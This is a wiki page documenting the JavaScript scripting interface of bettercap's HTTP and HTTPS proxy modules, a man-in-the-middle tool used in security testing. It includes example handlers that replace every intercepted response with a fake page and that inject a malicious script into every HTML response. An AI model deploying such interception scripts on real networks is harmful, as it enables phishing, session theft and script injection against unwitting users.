http.modules - rhaidiz/bettercap GitHub Wiki
The http.proxy
and https.proxy
modules can be scripted using javascript files that must declare at least one of the following functions:
// called when the script is loaded
function onLoad() {
}
// called when the request is received by the proxy
// and before it is sent to the real server.
function onRequest(req, res) {
}
// called when the request is sent to the real server
// and a response is received
function onResponse(req, res) {
}
// called every time an unknown session command is typed,
// proxy modules can optionally handle custom commands this way:
function onCommand(cmd) {
if( cmd == "test" ) {
/*
* Custom session command logic here.
*/
// tell the session we handled this command
return true
}
}
Modules can change the req
request and res
response objects, for instance the web-override.cap caplet is using the onRequest
function in order to override every request before it is executed with a fake response:
function onRequest(req, res) {
res.Status = 200;
res.ContentType = "text/html";
res.Body = readFile("caplets/www/index.html");
headers = res.Headers.split("\r\n")
for (var i = 0; i < headers.length; i++) {
header_name = headers[i].replace(/:.*/, "")
res.RemoveHeader(header_name);
}
res.SetHeader("Connection", "close");
}
The login-man-abuse.cap caplet instead will use the onResponse
handler to inject its malicious javascript file in every html response:
function onResponse(req, res) {
if( res.ContentType.indexOf('text/html') == 0 ){
var body = res.ReadBody();
if( body.indexOf('</head>') != -1 ) {
res.Body = body.replace(
'</head>',
'<script type="text/javascript">' + "\n" +
AbuserJavascript +
'</script>' +
'</head>'
);
}
}
}
Modules can use the following builtin functions.
function | description |
---|---|
readFile("/path/to/file") |
Return the contents of a file as a string. |
writeFile("/path/to/file", "hello world") |
Write the string hello world to a file, returns null or an error message. |
log_debug("message") |
Log a message in the interactive session (its level will be DEBUG ). |
log_info("message") |
Log a message in the interactive session (its level will be INFO ). |
log_warn("message") |
Log a message in the interactive session (its level will be WARNING ). |
log_error("message") |
Log a message in the interactive session (its level will be ERROR ). |
log_fatal("message") |
Log a message in the interactive session (its level will be FATAL ). |
log("message") |
Shortcut for log_info("message") . |
btoa("message") |
Encode a message to base64. |
atob("bWVzc2FnZQ==") |
Decode a message from base64. |
env("iface.ipv4") |
Read a variable. |
env("foo", "bar") |
Set a variable. |